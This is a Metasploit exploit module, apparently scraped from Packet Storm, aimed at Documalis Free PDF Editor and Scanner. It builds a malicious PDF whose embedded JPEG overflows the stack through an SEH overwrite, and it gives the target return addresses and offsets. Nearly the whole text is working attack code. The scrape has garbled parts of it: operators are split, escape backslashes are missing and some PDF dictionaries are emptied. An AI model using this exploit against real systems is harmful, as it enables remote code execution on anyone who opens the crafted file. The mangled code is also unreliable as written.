Documalis Free PDF Editor 5.7.2.26 / Documalis Free PDF Scanner 5.7.2.122 Buffer Overflow ≈ Packet Storm
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::PDF
include Msf::Exploit::Seh
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Documalis Free PDF Editor and Scanner JPEG Stack Buffer Overflow',
'Description' => %q{
Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not
appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit
this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the
user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Vulnerability discovery and PoC
'
],
'References' =>
[
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
'Space' => 1715,
'DisableNops' => true
},
'Targets' =>
[
[
'Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10',
{
'Ret' => 0x0040160D, # pop esi # pop ebx # ret - PDFEditor.exe
'Offset' => 433
}
],
[
'Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10',
{
'Ret' => 0x004023FC, # pop edx # pop ebx # ret - DocumentScanner.exe
'Offset' => 433
}
]
],
'Notes' =>
{
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SERVICE_DOWN ],
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'Privileged' => false,
'DisclosureDate' => 'May 22 2020',
'DefaultTarget' => 0
)
)
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
]
)
end
def exploit
file_create(make_pdf)
end
def jpeg
buffer = "xFFxD8xFFxEEx00x0Ex41x64x6Fx62x65x00x64x80x00x00"
buffer < < "x00x02xFFxDBx00x84x00x02x02x02x02x02x02x02x02x02"
buffer < < "x02x03x02x02x02x03x04x03x03x03x03x04x05x04x04x04"
buffer < < "x04x04x05x05x05x05x05x05x05x05x05x05x07x08x08x08"
buffer < < "x07x05x09x0Ax0Ax0Ax0Ax09x0Cx0Cx0Cx0Cx0Cx0Cx0Cx0C"
buffer < < "x0Cx0Cx0Cx0Cx0Cx0Cx0Cx01x03x02x02x03x03x03x07x05"
buffer < < "x05x07x0Dx0Ax09x0Ax0Dx0Fx0Dx0Dx0Dx0Dx0Fx0Fx0Cx0C"
buffer < < "x0Cx0Cx0Cx0Fx0Fx0Cx0Cx0Cx0Cx0Cx0Cx0Fx0Cx0Ex0Ex0E"
buffer < < "x0Ex0Ex0Cx11x11x11x11x11x11x11x11x11x11x11x11x11"
buffer < < "x11x11x11x11x11x11x11x11xFFxC0x00x14x08x00x32x00"
buffer < < "xE6x04x01x11x00x02x11x01x03x11x01x04x11x00xFFxC4"
buffer < < "x01xA2x00x00x00x07x01x01x01x01x01x00x00x00x00x00"
buffer < < "x00x00x00x04x05x03x02x06x01x00x07x08x09x0Ax0Bx01"
buffer < < "x54x02x02x03x01x01x01x01x01x00x00x00x00x00x00x00"
buffer < < "x01x00x02x03x04x05x06x07"
buffer < < rand_text(target['Offset']) # Junk
buffer < < generate_seh_record(target.ret)
buffer < < payload.encoded
buffer < < rand_text(2388 - buffer.length)
buffer
end
def make_pdf
@pdf < < header
add_object(1, '< >')
add_object(2, '< >')
add_object(3, '< >>>/MediaBox[0 0 612.0 792.0]>>')
add_object(4, '[/PDF/Text/ImageC]')
add_object(5, '< >')
stream_1 = 'stream' < < eol
stream_1 < < '0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q' << eol
stream_1 < < 'endstream' << eol
add_object(6, "< >#{stream_1}")
stream = '< <' << eol
stream < < '/Width 230' << eol
stream < < '/BitsPerComponent 8' << eol
stream < < '/Name /X' << eol
stream < < '/Height 50' << eol
stream < < '/Intent /RelativeColorimetric' << eol
stream < < '/Subtype /Image' << eol
stream < < '/Filter /DCTDecode' << eol
stream < < "/Length #{jpeg.length}" << eol
stream < < '/ColorSpace /DeviceCMYK' << eol
stream < < '/Type /XObject' << eol
stream < < '>>'
stream < < 'stream' << eol
stream < < jpeg << eol
stream < < 'endstream' << eol
add_object(7, stream)
finish_pdf
end
end
Gloss